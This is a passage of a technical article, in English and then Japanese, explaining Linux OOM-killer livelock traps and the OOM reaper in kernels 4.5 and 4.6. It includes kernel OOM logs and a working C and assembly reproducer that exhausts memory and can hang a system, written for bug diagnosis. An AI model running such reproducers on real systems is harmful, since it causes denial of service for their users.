[  153.559240]  [<ffffffff813b9f0d>] moom_callback+0x4d/0x50
[  153.561106]  [<ffffffff8109d5fb>] process_one_work+0x17b/0x470
[  153.563087]  [<ffffffff8109e3cb>] worker_thread+0x11b/0x400
[  153.564985]  [<ffffffff8109e2b0>] ? rescuer_thread+0x400/0x400
[  153.566970]  [<ffffffff810a5aef>] kthread+0xcf/0xe0
[  153.568698]  [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140
[  153.570730]  [<ffffffff81646118>] ret_from_fork+0x58/0x90
[  153.572598]  [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140
[  153.574643] Mem-Info:
[  153.575900] Node 0 DMA per-cpu:
[  153.577241] CPU    0: hi:    0, btch:   1 usd:   0
[  153.578865] CPU    1: hi:    0, btch:   1 usd:   0
[  153.580424] CPU    2: hi:    0, btch:   1 usd:   0
[  153.582002] CPU    3: hi:    0, btch:   1 usd:   0
[  153.583554] Node 0 DMA32 per-cpu:
[  153.584864] CPU    0: hi:  186, btch:  31 usd:  30
[  153.586334] CPU    1: hi:  186, btch:  31 usd:  59
[  153.587830] CPU    2: hi:  186, btch:  31 usd:   1
[  153.589286] CPU    3: hi:  186, btch:  31 usd:  30
[  153.590707] active_anon:404558 inactive_anon:2096 isolated_anon:0
[  153.590707]  active_file:0 inactive_file:0 isolated_file:0
[  153.590707]  unevictable:0 dirty:0 writeback:0 unstable:0
[  153.590707]  free:12893 slab_reclaimable:4632 slab_unreclaimable:5619
[  153.590707]  mapped:404 shmem:2161 pagetables:2162 bounce:0
[  153.590707]  free_cma:0
[  153.599409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  153.608512] lowmem_reserve[]: 0 1720 1720 1720
[  153.610098] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes
[  153.620715] lowmem_reserve[]: 0 0 0 0
[  153.622939] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[  153.627718] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB
[  153.632880] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[  153.635206] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  153.637597] 2162 total pagecache pages
[  153.639022] 0 pages in swap cache
[  153.640456] Swap cache stats: add 0, delete 0, find 0/0
[  153.642204] Free swap  = 0kB
[  153.643552] Total swap = 0kB
[  153.644892] 524157 pages RAM
[  153.646150] 0 pages HighMem/MovableOnly
[  153.647650] 79320 pages reserved
[  153.649047] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  153.651334] [  588]     0   588     9204      387      19        0             0 systemd-journal
[  153.653757] [  604]     0   604    10814      170      21        0         -1000 systemd-udevd
[  153.656237] [  912]     0   912    12803      115      25        0         -1000 auditd
[  153.658523] [ 1967]    70  1967     6997       63      18        0             0 avahi-daemon
[  153.660967] [ 1979]     0  1979    72391      919      42        0             0 rsyslogd
[  153.663275] [ 1982]     0  1982    80896     4252      78        0             0 firewalld
[  153.665703] [ 1983]     0  1983     4829       76      14        0             0 irqbalance
[  153.668042] [ 1984]     0  1984     6612       79      15        0             0 systemd-logind
[  153.670465] [ 1985]    81  1985     6672      122      18        0          -900 dbus-daemon
[  153.672794] [ 1990]    70  1990     6997       58      17        0             0 avahi-daemon
[  153.675240] [ 2015]     0  2015    52593      433      56        0             0 abrtd
[  153.677508] [ 2017]     0  2017    51993      339      54        0             0 abrt-watch-log
[  153.679997] [ 2018]     0  2018     1094       24       8        0             0 rngd
[  153.682203] [ 2044]     0  2044    31583      150      21        0             0 crond
[  153.684481] [ 2181]     0  2181    46752      224      41        0             0 vmtoolsd
[  153.686791] [ 2803]     0  2803    27631     3114      51        0             0 dhclient
[  153.689039] [ 2807]   999  2807   132051     2254      54        0             0 polkitd
[  153.691348] [ 2890]     0  2890    20640      216      40        0         -1000 sshd
[  153.693561] [ 2893]     0  2893   138262     2660      91        0             0 tuned
[  153.695769] [ 4096]     0  4096    22785      252      42        0             0 master
[  153.698045] [ 4102]     0  4102    64751      994      57        0          -900 abrt-dbus
[  153.700317] [ 4108]     0  4108    23201      163      51        0             0 login
[  153.702487] [ 4109]     0  4109    27509       33      12        0             0 agetty
[  153.704747] [ 4113]     0  4113    79455      358     104        0             0 nmbd
[  153.706944] [ 4115]    89  4115    22811      249      44        0             0 pickup
[  153.709075] [ 4116]    89  4116    22828      250      45        0             0 qmgr
[  153.711222] [ 4130]     0  4130    96508      528     138        0             0 smbd
[  153.713329] [ 4134]     0  4134    96508      528     132        0             0 smbd
[  153.715421] [ 4137]  1000  4137    28884      130      14        0             0 bash
[  153.717453] [ 4158]  1000  4158   541715   385821     763        0             0 memset+write
[  153.719591] [ 4160]  1000  4160     1042       21       6        0             0 memset+write
[  153.721674] [ 4161]  1000  4161     1042       21       6        0             0 memset+write
[  153.723898] [ 4162]  1000  4162     1042       21       6        0             0 memset+write
[  153.725988] [ 4163]  1000  4163     1042       21       6        0             0 memset+write
[  153.728070] [ 4164]  1000  4164     1042       21       6        0             0 memset+write
[  153.730085] [ 4165]  1000  4165     1042       21       6        0             0 memset+write
[  153.732057] [ 4166]  1000  4166     1042       21       6        0             0 memset+write
[  153.734018] [ 4167]  1000  4167     1042       21       6        0             0 memset+write
[  153.735981] [ 4168]  1000  4168     1042       21       6        0             0 memset+write
[  153.737926] Out of memory: Kill process 4158 (memset+write) score 869 or sacrifice child
[  153.739792] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB
---------- Example output end ----------

(Footnote: The reproducibility of hangup is not 100%. Likeliness of reproducing the hangup depends on timings and environments. Also, when the system hung up, the CPU usage can remain 100% in some cases, and the CPU usage can remain 0% in other cases.)


4.2 Why did the system hang up?

The answer is The "too small to fail" memory-allocation rule which exposed the contradiction in the memory management subsystem in Christmas of 2014.

It turned out that, memory allocation requests which are less than or equals to order-3 (1 byte to 32768 bytes), unless TIF_MEMDIE is set by the OOM killer, retry forever until they succeeds.

On the other hand, since the callers of GFP_NOFS allocation requests (for performing fs writeback operations, like xfs filesystems) did not expect such behavior, the callers of GFP_NOFS allocation requests cannot make forward progress unless TIF_MEMDIE is set. As a result, the callers of GFP_KERNEL allocation requests (like applications) are forever blocked by the callers of GFP_NOFS allocation requests.

If TIF_MEMDIE was set on a thread doing GFP_NOFS allocation requests, or, GFP_NOFS had higher preference than GFP_KERNEL, the kernel would not have blocked forever threads doing GFP_KERNEL allocation requests. But since xfs filesystem is cooperating among many kernel threads in order to perform complicated operations, it was impossible to set TIF_MEMDIE to a thread doing GFP_NOFS allocation requests, and resulted in blocking forever.

This affair became a trigger for seriously consider about behavior of the kernel under memory pressure. Until then, this was a problem which merely makes involved people angry with "Your system is already DoS attacked and it is too late to recover. Give up and restart your system." Now, the direction of the wind changed drastically.

This became a far seriously important problem than CVE-2013-4312 (later CVE-2016-2847), and as a troubleshooting staff at support center who handled unexplained hangups I came to think that we by all means want to avoid this problem.


4.3 About OOM livelock situation

Due to existence of aforementioned the "too small to fail" memory-allocation rule, doing a memory allocation request with locks held entails risk of lockup because a process which was killed (and has TIF_MEMDIE flag set) by the OOM killer invoked by a memory allocation request cannot make forward progress due to waiting for other process doing that memory allocation request with locks held.

But locks are necessary for exclusion control. A caller of memory allocation request cannot allocate memory due to unable to determine how much memory is required until exclusion control begins (or locks are held).

If all locations between holding a lock till releasing that lock were killable (i.e. can be interrupted by SIGKILL signal), this will not be a problem. But not all locations which might allocate memory with a lock held are killable.

As a result, TIF_MEMDIE not only serves as a mechanism for "not to kill processes more than necessary" but also serves as a mechanism for "hang up the system if the process killed by the OOM killer cannot terminate and release memory".

This is OOM livelock situation which occurs when the OOM killer was invoked.

  As a side note, there is also OOM livelock situation which occurs when the OOM killer was not invoked (i.e. there is no process with TIF_MEMDIE set) which is caused by different causes. Such cases are explained in Various ambushes, in chronological order?


4.4 About timeout-based workarounds

The affair occurred one month after the discussion of memory consumption attack using pipe's buffer went to public mailing lists.

At the public mailing lists, I proposed invoking the OOM killer using timeout, for there are so many kernel versions which are vulnerable to this attack, and I also wanted a workaround for hang up problems without invoking the OOM killer, and I put most priority for backportable approach.

But Michal Hocko is rigidly opposed to timeout-based workarounds and is asking for a solution which does not use timeouts. Therefore, I'm trying to clarify all of the locations which might result in a hangup, and presenting a reproducer and a log as much as possible, and questioning him about "How can you handle this case without using timeout?", and such days are lasting even now.

  →Thanks to such effort, various unexpected ambushes were discovered one after another in this one year and a half. Of course, not all ambushes were discovered are discovered, and some of ambushes are left unfixed.

In order to avoid convoluting the story, I first explain about OOM reaper which is a mitigation for OOM livelock situation after the kernel was able to invoke the OOM killer. (Well, OOM reaper alone is long enough.)


Chapter 5   About OOM reaper


5.1 The flow of OOM killer in Linux 4.5

Firstly, I explain the flow of the OOM killer as of Linux 4.5. (The flow of the OOM killer is very complicated, and has a history of trial and errors. Thus, the flow might be different for older kernels.)

(kill1)

out_of_memory() is called when free memory was unavailable (an OOM situation occurred) for allocation requests with either "order is less or equals to 3 and contain __GFP_FS flag" or "contain __GFP_NOFAIL" flag.

(kill2)

If current thread has already received SIGKILL or already has PF_EXITING (terminating) flag, the OOM killer sets TIF_MEMDIE flag to current thread and returns to the caller, so that we don't kill more processes than needed because there is a possibility of making free memory by releasing memory associated with current thread's mm_struct. (Trap 1)

(kill3)

Otherwise, select_bad_process() is called from out_of_memory(), in order to find candidate processes for forced termination.

(kill4)

select_bad_process() calls oom_scan_process_thread() on all threads of all thread groups which exist in the system.

If oom_scan_process_thread() returned OOM_SCAN_ABORT, select_bad_process() stops searching for candidates and returns -1 to out_of_memory().

If oom_scan_process_thread() returned OOM_SCAN_SELECT, select select_bad_process() marks that thread as the highest candidate. But scanning is continued because there is a possibility that oom_scan_process_thread() returns OOM_SCAN_ABORT for some other thread after oom_scan_process_thread() returned OOM_SCAN_SELECT for one thread.

If oom_scan_process_thread() returned OOM_SCAN_CONTINUE, select_bad_process() skips that thread.

If oom_scan_process_thread() returned OOM_SCAN_OK, select_bad_process() calls oom_badness() on that thread, in order to determine degree of contribution for OOM situation. If the value returned by oom_badness() (the minimum value is 0) for that thread is larger than the highest candidate's value, select_bad_process() marks that thread as new candidate.

If there was at least one candidate thread, select_bad_process() returns that thread to out_of_memory(). Otherwise, select_bad_process() returns 0 to out_of_memory().

(kill5)

oom_scan_process_thread() determines whether that thread can become a candidate for forced termination by the OOM killer.

Firstly, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread is the init process (which will lead to kernel panic if forcibly terminated) or is kernel threads (which are not suitable to forcibly terminate), in order to make sure that the OOM killer will not terminate that process.

Next, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread already has TIF_MEMDIE flag, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 2)

Next, since there is an assumption that majority of memory consumption is associated with mm_struct, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread does not have mm_struct, in order to skip that thread.

Next, since it is likely that the cause of OOM situation is trying to delete swap partition (i.e. swapoff() system call), oom_scan_process_thread() returns OOM_SCAN_SELECT to select_bad_process() if that thread is trying to delete swap partition, in order to make sure that the OOM killer forcibly terminates that thread in order to abort deleting swap partition.

Next, since there is a possibility that an already terminating thread can make free memory by releasing mm_struct, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread if that thread is already terminating, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 3)

Otherwise, since such thread can become a candidate for forced termination by the OOM killer, oom_scan_process_thread() returns OOM_SCAN_OK to select_bad_process().

(kill6)

oom_badness() evaluates degree of contribution for OOM situation.

Firstly, oom_badness() returns 0 to select_bad_process() if that thread is the init process (which will lead to kernel panic if forcibly terminated) or is kernel threads (which are not suitable to forcibly terminate), in order to make sure that the OOM killer will not terminate that process.

Next, since all threads in a thread group are considered as already terminating, oom_badness() returns 0 to select_bad_process() if none of threads in a thread group which contains that thread has mm_struct, in order to skip that thread.

Next, since the system administrator does not want the OOM killer to forcibly terminate processes with oom_score_adj value (the content of /proc/$pid/oom_score_adj ) equals to -1000, oom_badness() returns 0 to select_bad_process() if a thread group which contains that thread has oom_score_adj value equals to -1000.

Otherwise, oom_badness() returns a value larger than 0 to select_bad_process(), based on a score calculated from memory usage associated with that thread group's mm_struct.

(kill7)

As of returning from select_bad_process(), the candidate process for forced termination is determined.

If select_bad_process() returned -1, out_of_memory() returns to the caller without doing anything.

If select_bad_process() returned 0, out_of_memory() triggers kernel panic.

If select_bad_process() returned neither -1 nor 0, out_of_memory() passes that value to oom_kill_process().

(kill8)

oom_kill_process() does the job for forced termination by actually sending SIGKILL signal.

Firstly, if that process is already terminating, the OOM killer sets TIF_MEMDIE flag to that thread and returns to the caller, so that we don't kill more processes than needed because there is a possibility of making free memory by releasing memory associated with that thread's mm_struct. (Trap 4)

Next, the OOM killer prints messages that indicate the OOM killer was invoked. This is the first stage, administrator can confirm that the OOM killer was invoked. If an OOM livelock situation occurred prior to this stage, it looks like that the system hung up without any messages.

Next, the OOM killer checks all child processes of a process which contains that thread for forced termination. And if the OOM killer found a child process which is suitable for forced termination, the OOM killer selects that process as the final candidate for forced termination.

This is based on a heuristic that "killing a child process likely has smaller damage for the system than killing a parent process".

I consider that the OOM killer should not select a child process if that thread was selected by OOM_SCAN_SELECT because the OOM killer will needlessly kill all child processes of that thread, but the OOM killer unconditionally tries to select a child. This is based on a heuristic that "it is unlikely that a process which deletes a swap partition has child processes".

As of this point, a thread group for forced termination is finalized.

(kill9)

The OOM killer sends SIGKILL signal to a thread group containing that thread, and sets TIF_MEMDIE flag to first thread which has mm_struct in that thread group.

The reason why TIF_MEMDIE flag is set to a thread which has mm_struct is explained later.

(kill10)

Also, the OOM killer sends SIGKILL signal to all thread groups sharing that mm_struct if they are suitable for forced termination.

There is a comment in the source code that "this is necessary for avoiding OOM livelock caused by mm->mmap_sem", but there is no guarantee that we can reliably avoid it. It just reduces possibility of occurring OOM livelock caused by mm->mmap_sem. (Trap 5)

Also, there is a comment that "threads which were forcibly terminated but did not get TIF_MEMDIE flag are no problem because such threads will get TIF_MEMDIE next time out_of_memory() is called because they already have received SIGKILL signal", but there is no guarantee that TIF_MEMDIE flag is set reliably. (Trap 6)

From (Trap 1) to (Trap 6) are pitfalls where the OOM livelock situation can occur if waited that situation (for forever and unconditionally). But probably you are not sure why they can be traps. Therefore, I explain the flow of termination a thread (mainly steps till disassociating mm_struct and clearing TIF_MEMDIE flag).

(exit1)

A terminating thread calls do_exit() function. If that thread is terminating voluntarily, that thread will be able to call do_exit() smoothly. But if that thread is terminating forcibly by the OOM killer, it is possible that that thread is unable to call do_exit() due to being blocked in unkillable wait.

If the cause of a thread being blocked in unkillable wait is memory allocation request, that thread won't be able to leave from unkillable wait until that memory allocation succeeds or fails.

If that thread is doing memory allocation request, and already has SIGKILL signal received, TIF_MEMDIE flag will be set due to (kill2), and that thread can complete that memory allocation request. But if that thread is waiting for memory allocation of other threads with locks held, unless TIF_MEMDIE flag is set to threads due to (kill2) or (kill9), these threads can't complete their memory allocation requests.

That is, (Trap 2) is "a typical OOM livelock situation which occurs when the OOM killer was invoked", and is caused by TIF_MEMDIE being not set to threads doing memory allocation.

Also, (Trap 6) is caused by, like explained at (kill1), the OOM killer is not invoked unless that allocation request is either "order is less or equals to 3 and contain __GFP_FS flag" or "contains __GFP_NOFAIL" flag. For example, if that thread is doing GFP_NOFS or GFP_NOIO allocation request with order being less or equals to 3, TIF_MEMDIE flag will not be set on that thread due to (kill2) even if that thread already received SIGKILL signal. And OOM livelock situation occurs due to the "too small to fail" memory-allocation rule because that memory allocation requests loops forever as long as the OOM killer is called.

And (Trap 1) is caused by TIF_MEMDIE is not set to other threads due to (kill5) after TIF_MEMDIE was set to one thread due to (kill2) and was able to complete that memory allocation request and then started waiting for memory allocation by other threads.

(exit2)

Steps afterwards are about a terminating thread was able to call do_exit().

A terminating thread gets PF_EXITING flag which indicates that "this thread is terminating" by calling exit_signals(). This allows current thread to get TIF_MEMDIE due to (kill2).

(exit3)

A terminating thread calls exit_mm() in order to release mm_struct.

In exit_mm(), mmap_sem is held for shared (down_read(&current->mm->mmap_sem)) in order to synchronize with operations for forced termination due to invalid memory access (core dump operation).

Holding mmap_sem for shared mode means that somewhere holds mmap_sem for exclusive mode. While there are several locations which hold mmap_sem for exclusive mode, a typical location is mmap() operation. mmap() holds mmap_sem for exclusive mode (down_write(&current->mm->mmap_sem)) and then does memory allocation requests. Therefore, (Trap 3) happens, when thread-A in a multi-threaded process is in unkillable wait state at down_read(&current->mm->mmap_sem) after PF_EXITING flag was set, thread-B tries to invoke the OOM killer by doing a memory allocation request after down_write(&current->mm->mmap_sem) but the OOM killer waits for thread-A which already got PF_EXITING flag to release mm_struct because the OOM killer fails to understand that thread-B needs to release mmap_sem held for exclusive mode in order to allow thread-A to release mm_struct.

(Trap 5) is caused by falling into situation where other threads which passed down_write(&current->mm->mmap_sem) are blocked by unkillable wait (inside memory allocation request or outside of memory allocation request) and thus cannot release mmap_sem held for exclusive mode.

Similarly, (Trap 4) is caused by not sending SIGKILL to other threads which passed down_write(&current->mm->mmap_sem) are blocked by unkillable wait or killable wait.

(exit4)

If mmap_sem was successfully held for shared mode, current thread performs core dump operation if needed. Then, current thread releases mm_struct and mmap_sem.

But there is no guarantee that memory is reclaimed as free memory immediately after releasing mm_struct. If current thread is one of threads in a multi-threaded program, memory could not be reclaimed as free memory until all threads using that mm_struct releases their mm_struct. Thus, mmput(current->mm) is called in order to release only mm_struct used by current thread. Upon returning from mmput(current->mm), TIF_MEMDIE flag is cleared because memory which can be reclaimed is considered as reclaimed; and the OOM killer starts selecting other threads.

mmput() decrements refcount, and performs memory reclaim operation only when that refcount dropped to 0. And memory reclaim operation includes operations (such as waiting for completion of asynchronous I/O) which could be blocked by memory allocation request. Since mm_struct was released but TIF_MEMDIE flag is not yet cleared, threads doing memory allocation request falls into (Trap 2) situation where the OOM killer cannot be invoked due to behavior explained at (kill5).

Since it is considered that there is still memory reclaimable until an exiting thread returns from mmput(), allocating threads do not want to invoke the OOM killer. But there is an blank period where allocating threads cannot know that we are inside a situation where we cannot make forward progress without invoking the OOM killer.

(exit5)

After returning from exit_mm(), the rest of cleanup operations such as closing file descriptors are performed. Since mm_struct was already released, the behavior explained at (kill2) is no longer applied. If memory allocation requests caused by the rest of cleanup operations invoked the OOM killer, the OOM killer selects other threads.

What did you think? The exclusion control which the OOM killer uses in order "not to kill more processes than necessary" did not think race conditions between other threads and did not consider cases where threads which are expected to release mm_struct are blocked. What an optimistic approach!

Therefore, introducing the OOM reaper, which will handle cases where threads which are expected to release mm_struct are blocked, becomes a solution for OOM livelock problem when the OOM killer could be invoked.

The OOM reaper, which was discussed at LSF/MM summit held in March 2015 and was introduced in Linux 4.6, can reduce the possibility of falling into OOM livelock situation by reclaiming memory used by thread group which was terminated by the OOM killer before mm_struct used by that thread group is released.


5.2 The flow of OOM killer in Linux 4.6

ということで、 Linux 4.6 時点での、 OOM killer の流れを説明します。

(kill1)

Linux 4.5 の (kill1) と同じであるため省略します。

(kill2)

Linux 4.5 の (kill2) と同じであるため省略します。

(kill3)

Linux 4.5 の (kill3) と同じであるため省略します。

(kill4)

Linux 4.5 の (kill4) と同じであるため省略します。

(kill5)

oom_scan_process_thread() は、そのスレッドが OOM killer により強制終了させる候補になりうるかどうかの判断を行います。

OOM livelock 状態の原因となりうる空白の期間を潰すために、 oom_scan_process_thread() 内の task_will_free_mem(task) 時の処理が削除されました。

それ以外は Linux 4.5 の (kill5) と同様です。

(kill6)

Linux 4.5 の (kill6) と同じであるため省略します。

(kill7)

Linux 4.5 の (kill7) と同じであるため省略します。

(kill8)

Linux 4.5 の (kill8) と同じであるため省略します。

(kill9)

Linux 4.5 の (kill9) と同じであるため省略します。

(kill10)

強制終了させられるスレッドの mm_struct を使用している他のスレッドグループに対しても、 OOM killer により強制終了させることが妥当なスレッドグループであれば SIGKILL シグナルを送信します。

そして、その mm_struct を使用している全てのスレッドグループが OOM killer により強制終了させることが妥当なスレッドグループであった場合、 OOM reaper を呼び出します。

(kill11)

OOM reaper は、 mmap_sem を共有モードでの取得を試みます。

取得に成功した場合のみ、その mm_struct に含まれているメモリの内の解放可能なページを解放後、 mmap_sem を解放します。

なお、全てのスレッドが mm_struct を解放したときに呼ばれる mmput() の処理は呼ばれていませんが、回収可能なメモリは粗方回収されたとみなすことができるため、 OOM reaper が正常に動作できた場合( mmap_sem を共有モードで取得できた場合)には、 TIF_MEMDIE フラグをクリアし、そのスレッドを含むスレッドグループが再度 OOM killer により選択されないようにするために、 oom_score_adj に -1000 を設定しています。(Trap 7)

スレッド終了時の流れは Linux 4.5 と同じであるため省略します。

(Trap 7)は、 OOM livelock 状態に陥る可能性がある箇所です。でも、どうして罠になりうるのでしょうか?

まずは、 OOM reaper が TIF_MEMDIE をクリアしている理由についてです。

OOM killer は、( oom_score_adj の値を加味した上で)最もメモリをたくさん消費しているプロセスを強制終了させる候補にしますが、 (kill8) で説明したとおり、 OOM killer により強制終了させることが妥当な子プロセスが存在する場合には、その子プロセスを選択します。そして、親プロセスがどんなにメモリをたくさん消費していたとしても、子プロセスのメモリ消費は限りなく 0 に近いという状況もありえます。例えば、以下のように、メモリ消費が限りなく 0 に近い子プロセスを OOM killer に選択させると、 OOM reaper は殆どメモリを回収することができません。

---------- oom-write.c ----------
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
        unsigned long size;
        char *buf = NULL;
        unsigned long i;
        for (i = 0; i < 10; i++) {
                if (fork() == 0) {
                        close(1);
                        open("/tmp/file", O_WRONLY | O_CREAT | O_APPEND, 0600);
                        execl("./write", "./write", NULL);
                        _exit(1);
                }
        }
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(5);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096)
                buf[i] = 0;
        pause();
        return 0;
}
---------- oom-write.c ----------
---------- write.asm ----------
; nasm -f elf write.asm && ld -s -m elf_i386 -o write write.o
section .text
    CPU 386
    global _start
_start:
; whlie (write(1, buf, 4096) == 4096);
    mov eax, 4 ; NR_write
    mov ebx, 1
    mov ecx, _start - 96
    mov edx, 4096
    int 0x80
    cmp eax, 4096
    je _start
; pause();
    mov eax, 29 ; NR_pause
    int 0x80
; _exit(0);
    mov eax, 1 ; NR_exit
    mov ebx, 0
    int 0x80
---------- write.asm ----------
---------- Example output start ----------
[   78.157198] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO)
(...snipped...)
[   78.325409] [ 3805]  1000  3805   541715   357876     708       6        0             0 oom-write
[   78.327978] [ 3806]  1000  3806       39        1       3       2        0             0 write
[   78.330149] [ 3807]  1000  3807       39        1       3       2        0             0 write
[   78.332167] [ 3808]  1000  3808       39        1       3       2        0             0 write
[   78.334488] [ 3809]  1000  3809       39        1       3       2        0             0 write
[   78.336471] [ 3810]  1000  3810       39        1       3       2        0             0 write
[   78.338414] [ 3811]  1000  3811       39        1       3       2        0             0 write
[   78.340709] [ 3812]  1000  3812       39        1       3       2        0             0 write
[   78.342711] [ 3813]  1000  3813       39        1       3       2        0             0 write
[   78.344727] [ 3814]  1000  3814       39        1       3       2        0             0 write
[   78.346613] [ 3815]  1000  3815       39        1       3       2        0             0 write
[   78.348829] Out of memory: Kill process 3805 (oom-write) score 808 or sacrifice child
[   78.350818] Killed process 3806 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB
[   78.455314] oom-write invoked oom-killer: order=0, oom_score_adj=0, gfp_mask=0x24280ca(GFP_HIGHUSER_MOVABLE|GFP_ZERO)
(...snipped...)
[   78.631333] [ 3805]  1000  3805   541715   361440     715       6        0             0 oom-write
[   78.633802] [ 3807]  1000  3807       39        1       3       2        0             0 write
[   78.635977] [ 3808]  1000  3808       39        1       3       2        0             0 write
[   78.638325] [ 3809]  1000  3809       39        1       3       2        0             0 write
[   78.640463] [ 3810]  1000  3810       39        1       3       2        0             0 write
[   78.642837] [ 3811]  1000  3811       39        1       3       2        0             0 write
[   78.644924] [ 3812]  1000  3812       39        1       3       2        0             0 write
[   78.646990] [ 3813]  1000  3813       39        1       3       2        0             0 write
[   78.649039] [ 3814]  1000  3814       39        1       3       2        0             0 write
[   78.651242] [ 3815]  1000  3815       39        1       3       2        0             0 write
[   78.653326] Out of memory: Kill process 3805 (oom-write) score 816 or sacrifice child
[   78.655235] Killed process 3807 (write) total-vm:156kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB
[   88.776446] MemAlloc-Info: 1 stalling task, 1 dying task, 1 victim task.
[   88.778228] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=10000
[   88.780158] MemAlloc: write(3807) uninterruptible dying victim
(...snipped...)
[   98.915687] MemAlloc-Info: 8 stalling task, 1 dying task, 1 victim task.
[   98.917888] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=14885 uninterruptible
[   98.920297] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=20139
[   98.922652] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=16231
[   98.924874] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=20044
[   98.927043] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=10230 uninterruptible
[   98.929405] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=14716
[   98.931559] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=14887
[   98.933843] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=14887 uninterruptible exiting
[   98.936460] MemAlloc: write(3807) uninterruptible dying victim
(...snipped...)
[  140.356230] MemAlloc-Info: 9 stalling task, 1 dying task, 1 victim task.
[  140.358448] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=56326 uninterruptible
[  140.360979] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=61580 uninterruptible
[  140.363716] MemAlloc: irqbalance(1710) seq=3 gfp=0x24280ca order=0 delay=57672
[  140.365983] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=61485 uninterruptible
[  140.368521] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=51671 uninterruptible
[  140.371128] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=56157 uninterruptible
[  140.373548] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=48147
[  140.375722] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=56328 uninterruptible
[  140.378647] MemAlloc: write(3806) seq=29813 gfp=0x2400240 order=0 delay=56328 exiting
[  140.381695] MemAlloc: write(3807) uninterruptible dying victim
(...snipped...)
[  150.493557] MemAlloc-Info: 7 stalling task, 1 dying task, 1 victim task.
[  150.495725] MemAlloc: kthreadd(2) seq=12 gfp=0x27000c0 order=2 delay=66463
[  150.497897] MemAlloc: systemd-journal(481) seq=17 gfp=0x24280ca order=0 delay=71717 uninterruptible
[  150.500490] MemAlloc: vmtoolsd(1908) seq=1 gfp=0x2400240 order=0 delay=71622 uninterruptible
[  150.502940] MemAlloc: pickup(3680) seq=1 gfp=0x2400240 order=0 delay=61808
[  150.505122] MemAlloc: nmbd(3713) seq=1 gfp=0x2400240 order=0 delay=66294 uninterruptible
[  150.507521] MemAlloc: smbd(3734) seq=1 gfp=0x27000c0 order=2 delay=58284
[  150.509678] MemAlloc: oom-write(3805) seq=12718 gfp=0x24280ca order=0 delay=66465 uninterruptible
[  150.512333] MemAlloc: write(3807) uninterruptible dying victim
---------- Example output end ----------

そのため、 OOM reaper が OOM 状態を解消するのに充分な量のメモリを回収できなかった場合には、 OOM livelock 状態に陥ってしまいます。これを避けるために、メモリを回収した後に TIF_MEMDIE をクリアするようにしています。

次に、 OOM reaper が oom_score_adj に -1000 を設定する理由についてです。

